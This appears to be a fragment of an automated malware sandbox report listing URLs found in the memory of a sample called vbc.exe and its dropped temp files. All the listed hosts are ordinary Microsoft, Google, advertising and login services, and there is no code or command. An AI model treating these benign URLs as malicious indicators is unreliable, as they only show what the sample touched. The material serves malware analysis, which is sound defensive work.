            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
            Source: bhv2307.tmp.23.dr, bhvED61.tmp.19.dr, bhvBB7.tmp.21.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
            Source: bhvAE74.tmp.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
            Source: bhvAE74.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
            Source: vbc.exe, 00000002.00000003.258804359.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.280774085.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297394519.000000000275B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
            Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://pki.goog/repository/0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/
            Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
